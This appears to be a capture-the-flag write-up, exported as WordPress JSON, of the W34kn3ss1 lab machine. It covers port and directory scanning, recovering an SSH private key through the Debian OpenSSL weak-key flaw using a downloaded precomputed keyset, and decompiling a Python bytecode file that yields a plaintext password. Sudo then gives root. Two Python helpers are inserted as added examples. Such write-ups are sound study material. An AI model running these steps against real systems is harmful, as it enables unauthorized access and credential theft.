{"id":335,"date":"2024-05-04T10:22:51","date_gmt":"2024-05-04T02:22:51","guid":{"rendered":"http:\/\/xiyu12.top\/?p=335"},"modified":"2024-05-04T10:22:51","modified_gmt":"2024-05-04T02:22:51","slug":"w34kn3ss1","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=335","title":{"rendered":"W34kn3ss1"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">1. Information gathering<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">A full TCP port sweep first, then version detection and default scripts against the three open ports:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sT --min-rate 10000 -p- 192.168.1.143\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-04 08:53 CST\nNmap scan report for weakness.jth (192.168.1.143)\nHost is up (0.00088s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT    STATE SERVICE\n22\/tcp  open  ssh\n80\/tcp  open  http\n443\/tcp open  https\nMAC Address: 00:0C:29:D3:FE:58 (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 3.48 seconds\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sC -sV -p 22,80,443 192.168.1.143\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-04 08:53 CST\nNmap scan report for weakness.jth (192.168.1.143)\nHost is up (0.00033s latency).\n\nPORT    STATE SERVICE  VERSION\n22\/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 de:89:a2:de:45:e7:d6:3d:ef:e9:bd:b4:b6:68:ca:6d (RSA)\n|   256 1d:98:4a:db:a2:e0:cc:68:38:93:d0:52:2a:1a:aa:96 (ECDSA)\n|_  256 3d:8a:6b:92:0d:ba:37:82:9e:c3:27:18:b6:01:cd:98 (ED25519)\n80\/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Hmmmm ??\n443\/tcp open  ssl\/http Apache httpd 2.4.29 ((Ubuntu))\n| ssl-cert: Subject: commonName=weakness.jth\/organizationName=weakness.jth\/stateOrProvinceName=Jordan\/countryName=jo\n| Not valid before: 2018-05-05T11:12:54\n|_Not valid after:  2019-05-05T11:12:54\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n| tls-alpn: \n|_  http\/1.1\n|_http-title: Apache2 Ubuntu Default Page: It 
works\n|_ssl-date: TLS randomness does not represent time\nMAC Address: 00:0C:29:D3:FE:58 (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 13.72 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The nmap scan shows that port 443 serves an SSL certificate. A certificate's common name normally identifies the domain or host the certificate was issued for, so this gives us a hostname: weakness.jth. Add it to the hosts file so the site can be reached by name:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>echo \"192.168.1.143 weakness.jth\" | sudo tee -a \/etc\/hosts<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">2. Getting a foothold<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Browse to the box by name, http:\/\/weakness.jth\/.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The page shows only a banner. Banners are usually meaningless, but readable text inside one deserves a careful look: this one contains the string n30. Write it down; it comes back later.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-100854-1024x433.png\" alt=\"Screenshot of the banner on http:\/\/weakness.jth\/ containing the string n30\" class=\"wp-image-336\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/weakness.jth\/ --wordlist=\/usr\/share\/wordlists\/dirb\/big.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n&#91;+] Url:                     http:\/\/weakness.jth\/\n&#91;+] Method:                  GET\n&#91;+] Threads:                 10\n&#91;+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n&#91;+] Negative Status codes:   404\n&#91;+] User Agent:              gobuster\/3.6\n&#91;+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.htpasswd            (Status: 403) &#91;Size: 296]\n\/.htaccess            (Status: 403) &#91;Size: 296]\n\/private              (Status: 301) &#91;Size: 314] &#91;--> http:\/\/weakness.jth\/private\/]\n\/robots.txt           (Status: 200) &#91;Size: 14]\n\/server-status        (Status: 403) &#91;Size: 300]\nProgress: 20469 \/ 20470 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The 403s on \/.htpasswd, \/.htaccess and \/server-status are Apache's default deny rules, not findings; \/private is the lead. Browse to http:\/\/weakness.jth\/private\/, download the public key mykey.pub, then read notes.txt.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-101241.png'><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-101241.png\" alt=\"Screenshot of notes.txt under \/private\/\" class=\"wp-image-337\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">notes.txt reads:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>this key was generated by openssl 0.9.8c-1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">That version string points at the Debian OpenSSL PRNG bug (CVE-2008-0166). Debian and its derivatives shipped OpenSSL 0.9.8c-1 up to, but not including, 0.9.8g-9 with a patch that removed almost all entropy from the random number generator, leaving the process ID as effectively the only varying input. Every key produced by those packages therefore comes from a small, enumerable set: rather than brute-forcing the key, an attacker looks it up in a precomputed list. Exploit-DB entry 5622 describes the attack and ships that list:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>searchsploit prng\n\nsearchsploit -m linux\/remote\/5622.txt\n\nwget https:\/\/gitlab.com\/exploit-database\/exploitdb-bin-sploits\/-\/raw\/main\/bin-sploits\/5622.tar.bz2\n\ntar -xvjf 5622.tar.bz2<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">mykey.pub is a 2048-bit RSA key, so the candidates live under rsa\/2048. Each candidate is a pair of files: the public key with a .pub extension and the private key under the same name without it. Search the directory for a distinctive substring of the base64 blob in mykey.pub, copy out the private key of the same name, and restrict its permissions so ssh will accept it:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>grep -lr \"&lt;a substring of the base64 blob in mykey.pub&gt;\" rsa\/2048\ncp rsa\/2048\/&lt;matching name without .pub&gt; id_rsa\nchmod 600 id_rsa<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>cat mykey.pub \nssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg\/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47\/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j\/C5sIIqM\/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE\/4Iklgw== root@targetcluster<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The key comment says root@targetcluster. root is usually not allowed to log in over SSH, but it costs nothing to try:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh -i id_rsa root@192.168.1.143<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It fails. Remember the string on the banner page? This is why keeping notes during recon matters, and even more so keeping the whole picture in mind: go back to your own notes at every step. The string was n30, a plausible username.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh -i id_rsa n30@192.168.1.143<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Login succeeds.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">3. Privilege escalation<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>ls\ncode user.txt<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>file code\ncode: python 2.7 byte-compiled<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">file identifies code as Python 2.7 bytecode, that is a .pyc file: the output of byte-compiling a .py source (for example with Python's built-in compileall module, which compiles every .py under a directory into the matching .pyc). Give it the extension the decompilers expect:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mv code code.pyc<\/code><\/pre>\n\n\n\n<p 
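class=\"wp-block-paragraph\">Before turning to the bytecode, a worked example for the key lookup in section 2. It is an added example, not code from the original post: instead of grepping the keyset for a substring of mykey.pub, it decodes the base64 blob of an ssh-rsa line into the exponent and modulus and compares that key material against every .pub file under a keyset directory, then returns the private key stored beside the match (the assumption, which holds for the 5622 keyset, is that the private key has the same file name without the .pub suffix). The keyset in demo() is constructed in a temporary directory from toy moduli, not real keys; MYKEY_PUB is the key from mykey.pub above.<\/p>

```python
"""Look a public key up in a Debian-weak-key set and return its private key.

Added example, not code from the original post. Assumes the 5622 keyset
layout: every candidate is a pair <name>.pub (OpenSSH public key line)
and <name> (the matching private key) in the same directory.
"""
import base64
import os
import struct
import tempfile

# The public key served from /private/ on the target, copied from the post.
MYKEY_PUB = (
    "ssh-rsa "
    "AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN"
    "1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqw"
    "h38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfV"
    "ufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5w"
    "q7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo"
    "5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTq"
    "kjE/4Iklgw== root@targetcluster"
)


def decode_openssh_pubkey(line: str) -> tuple:
    """Parse an 'ssh-rsa <base64> [comment]' line into (e, n); comment is ignored."""
    fields = line.split()
    if len(fields) < 2 or fields[0] != "ssh-rsa":
        raise ValueError("not an ssh-rsa public key line")
    blob = base64.b64decode(fields[1])
    parts, pos = [], 0
    while pos < len(blob):                      # RFC 4251 strings: uint32 length + bytes
        if pos + 4 > len(blob):
            raise ValueError("malformed ssh-rsa blob")
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        pos += 4
        if pos + length > len(blob):
            raise ValueError("malformed ssh-rsa blob")
        parts.append(blob[pos:pos + length])
        pos += length
    if len(parts) != 3 or parts[0] != b"ssh-rsa":
        raise ValueError("malformed ssh-rsa blob")
    return int.from_bytes(parts[1], "big"), int.from_bytes(parts[2], "big")


def encode_openssh_pubkey(e: int, n: int, comment: str) -> str:
    """Inverse of decode_openssh_pubkey; used only to build the constructed keyset."""
    def mpint(x: int) -> bytes:
        raw = x.to_bytes((x.bit_length() + 8) // 8, "big")   # leading 0x00 keeps it positive
        return struct.pack(">I", len(raw)) + raw
    blob = struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def find_private_key(pubkey_line: str, keyset_dir: str):
    """Path of the private key whose .pub holds the same (e, n), or None."""
    target = decode_openssh_pubkey(pubkey_line)
    for root, _dirs, files in os.walk(keyset_dir):
        for name in sorted(files):
            if not name.endswith(".pub"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="ascii", errors="replace") as fh:
                candidate = fh.readline()
            try:
                if decode_openssh_pubkey(candidate) != target:
                    continue
            except ValueError:                  # not an ssh-rsa line; skip the file
                continue
            private = path[:-len(".pub")]       # keyset convention: same name, no suffix
            return private if os.path.isfile(private) else None
    return None


def demo() -> str:
    """Constructed keyset: two toy pairs in a temp dir; the wanted key is the second."""
    wanted = encode_openssh_pubkey(35, 0xD1F7B3, "n30@kali")   # comment differs on purpose
    with tempfile.TemporaryDirectory() as keyset:
        for name, n in (("0a1b-1234", 0xC5A3E1), ("7f9e-5678", 0xD1F7B3)):
            with open(os.path.join(keyset, name + ".pub"), "w") as fh:
                fh.write(encode_openssh_pubkey(35, n, "root@targetcluster") + "\n")
            with open(os.path.join(keyset, name), "w") as fh:
                fh.write("-----BEGIN RSA PRIVATE KEY-----\n(toy)\n-----END RSA PRIVATE KEY-----\n")
        found = find_private_key(wanted, keyset)
        return os.path.basename(found) if found else ""


if __name__ == "__main__":
    print(demo())                               # 7f9e-5678
    print(decode_openssh_pubkey(MYKEY_PUB)[1].bit_length())   # 2048
```

<p class=\"wp-block-paragraph\">Comparing the decoded modulus rather than a text fragment gives an exact answer and ignores the comment field, which is why the constructed lookup succeeds even though the comment on the wanted key (n30@kali) differs from the one in the keyset file (root@targetcluster). Decoding mykey.pub also confirms it is a 2048-bit key with public exponent 35, so rsa\/2048 is the right subtree of the keyset.<\/p>

<p 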
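class=\"wp-block-paragraph\">An added example for this step, not code from the original post: the grep over the decompiled source below only needs the string literals, and those can be read straight out of a Python 2.7 .pyc with a small reader for the 2.7 marshal format, without a decompiler and without ever importing the module. The reader parses the top-level code object, follows nested code objects and collects their string constants. SAMPLE_PYC is constructed inline with a tiny serializer (assumption: a module with three string constants and one nested function); it is not the target's code file.<\/p>

```python
"""Pull the string constants out of a CPython 2.7 .pyc without executing it.

Added example, not code from the original post: a reader for the Python 2.7
marshal format (file reported "python 2.7 byte-compiled") that walks every
code object's co_consts. Runs under Python 3; never imports the module.
"""
import struct
from dataclasses import dataclass

PY27_MAGIC = b"\x03\xf3\r\n"     # first 4 bytes of every CPython 2.7 .pyc
_NULL = object()                 # stands for TYPE_NULL ('0'), which terminates dicts


@dataclass
class Code:
    name: str
    filename: str
    consts: tuple


class Py27Unmarshaller:
    """Decodes the marshal type codes CPython 2.7 writes into .pyc files."""

    def __init__(self, data: bytes):
        self.data, self.pos, self.interned = data, 0, []

    def _read(self, n: int) -> bytes:
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated marshal data")
        self.pos += n
        return chunk

    def _i32(self) -> int:
        return struct.unpack("<i", self._read(4))[0]

    def load(self):
        t = self._read(1)
        simple = {b"0": _NULL, b"N": None, b"T": True, b"F": False}
        if t in simple:
            return simple[t]
        if t == b"i":
            return self._i32()
        if t == b"I":
            return struct.unpack("<q", self._read(8))[0]
        if t == b"g":
            return struct.unpack("<d", self._read(8))[0]
        if t in (b"s", b"t"):                    # byte string / interned byte string
            s = self._read(self._i32())
            if t == b"t":
                self.interned.append(s)
            return s
        if t == b"R":                            # back-reference to an interned string
            return self.interned[self._i32()]
        if t == b"u":                            # unicode, stored as UTF-8
            return self._read(self._i32()).decode("utf-8", "replace")
        if t in (b"(", b"[", b"<", b">"):        # tuple, list, set, frozenset
            return tuple(self.load() for _ in range(self._i32()))
        if t == b"{":
            d = {}
            while (k := self.load()) is not _NULL:
                d[k] = self.load()
            return d
        if t == b"c":                            # code object, fields in 2.7 order
            self._read(16)                       # argcount, nlocals, stacksize, flags
            self.load()                          # co_code
            consts = self.load()
            for _ in range(4):                   # names, varnames, freevars, cellvars
                self.load()
            filename, name = self.load(), self.load()
            self._i32()                          # firstlineno
            self.load()                          # lnotab
            return Code(_text(name), _text(filename), consts)
        raise ValueError(f"unsupported marshal type {t!r}")


def _text(v) -> str:
    return v.decode("latin-1") if isinstance(v, bytes) else str(v)


def extract_strings(pyc: bytes) -> list:
    """All non-empty string constants in a 2.7 .pyc, nested code objects included."""
    if pyc[:4] != PY27_MAGIC:
        raise ValueError("not a CPython 2.7 .pyc (magic mismatch)")
    top = Py27Unmarshaller(pyc[8:]).load()      # skip 4-byte magic + 4-byte mtime
    found = []

    def walk(obj):
        if isinstance(obj, Code):
            walk(obj.consts)
        elif isinstance(obj, tuple):
            for item in obj:
                walk(item)
        elif isinstance(obj, (bytes, str)) and obj:
            found.append(_text(obj))

    walk(top)
    return found


# Constructed sample .pyc, built with a tiny serializer (assumption: a module
# holding three string constants and one nested function). Not the target's file.
def _s(b: bytes, interned: bool = False) -> bytes:
    return (b"t" if interned else b"s") + struct.pack("<i", len(b)) + b


def _tup(*items: bytes) -> bytes:
    return b"(" + struct.pack("<i", len(items)) + b"".join(items)


def _code(consts: bytes, filename: bytes, name: bytes) -> bytes:
    return (b"c" + struct.pack("<iiii", 0, 0, 1, 64)
            + _s(b"d\x00\x00S")                  # LOAD_CONST 0; RETURN_VALUE
            + consts + _tup() * 4                # names, varnames, freevars, cellvars
            + filename + name + struct.pack("<i", 1) + _s(b""))


_NESTED = _code(_tup(b"N", b"u" + struct.pack("<i", 5) + b"tok3n"),
                _s(b"code.py", interned=True), _s(b"helper"))
SAMPLE_PYC = PY27_MAGIC + b"\x00\x00\x00\x00" + _code(
    _tup(_s(b"user"), _s(b"n30"), _s(b"pass"), _NESTED, b"N"),
    b"R" + struct.pack("<i", 0),                 # back-reference to interned "code.py"
    _s(b"<module>"))

if __name__ == "__main__":
    print(extract_strings(SAMPLE_PYC))          # ['user', 'n30', 'pass', 'tok3n']
```

<p class=\"wp-block-paragraph\">Run it on the real file with extract_strings(open(\"code.pyc\", \"rb\").read()). The magic check matters: a .pyc from another interpreter version has a different header and, for 3.x, a different code-object layout, so the reader refuses it instead of returning garbage.<\/p>

<p 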
class=\"wp-block-paragraph\">One option is an online Python decompiler:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-103053-1024x787.png\" alt=\"Screenshot of code.pyc decompiled in an online Python decompiler\" class=\"wp-image-340\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">A local tool avoids uploading the target's file to a third party; uncompyle6 handles Python 2.7 bytecode even when run under Python 3:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/rocky\/python-uncompyle6\">rocky\/python-uncompyle6: a cross-version Python bytecode decompiler (github.com)<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo pip install uncompyle6\n\nuncompyle6 code.pyc &gt; code.py<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-103253.png\" alt=\"Screenshot of uncompyle6 output for code.pyc\" class=\"wp-image-341\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">uncompyle6 writes the recovered source to standard output, hence the redirect into code.py. The interesting part is the string literals, so pull those out:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>grep -Po \"'(.*)'\" code.py | xargs<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This yields a credential, n30:dMASDNB!!#B!#!#33. With n30's password in hand, check what sudo allows:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo -l\n&#91;sudo] password for n30: \nMatching Defaults entries for n30 on W34KN3SS:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser n30 may run the following commands on W34KN3SS:\n    (ALL : ALL) ALL\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">n30 may run any command as any user, so a root shell is one command away:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo su<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>1. Information gathering The nmap scan shows that port 443 serves an SSL certificate. A certificate's common name normally identifies the domain or host the certificate 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[13,65,85,89,97],"class_list":["post-335","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-pyc","tag-prng","tag-ssh","tag-ssl-","tag-uncompyle6-python"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=335"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/335\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=335"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}